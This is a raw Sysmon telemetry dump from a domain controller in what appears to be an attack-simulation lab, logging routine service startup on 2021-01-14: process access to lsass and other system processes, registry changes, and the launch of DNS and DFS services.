10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40E0-6000-0E00-000000009901}1096C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0900-000000009901}808C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0900-000000009901}808C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.338{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\cdrom\Parameters\WppRecorder_TraceGuid{a4196372-c3c4-42d5-87bf-7edb2e9bcc27} 13241300x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\CountDWORD (0x00000001) 13241300x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volsnap\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 13241300x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\CountDWORD (0x00000001) 13241300x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:24.197{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\volume\Enum\0STORAGE\Volume\{492932f2-d455-11e9-aa46-806e6f6e6963}#0000000000100000 434400x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local2021-01-14 13:09:44.979Started13.014.50 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.634{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.634{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.618{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_1lllhjpq.ewr.ps12021-01-14 13:09:44.618 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.618{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4298-6000-3600-000000009A01}2528C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.603{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.603{08A6967A-4286-6000-0A00-000000009A01}8441120C:\Windows\system32\services.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.558{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\System32\dfsrs.exe10.0.14393.2879 (rs1_release_inmarket.190313-1855)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.603{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.603{08A6967A-4286-6000-0A00-000000009A01}8441208C:\Windows\system32\services.exe{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.563{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3600-000000009A01}2528C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4286-6000-0A00-000000009A01}844904C:\Windows\system32\services.exe{08A6967A-4298-6000-3600-000000009A01}2528C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.585{08A6967A-4298-6000-3600-000000009A01}2528C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.587{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 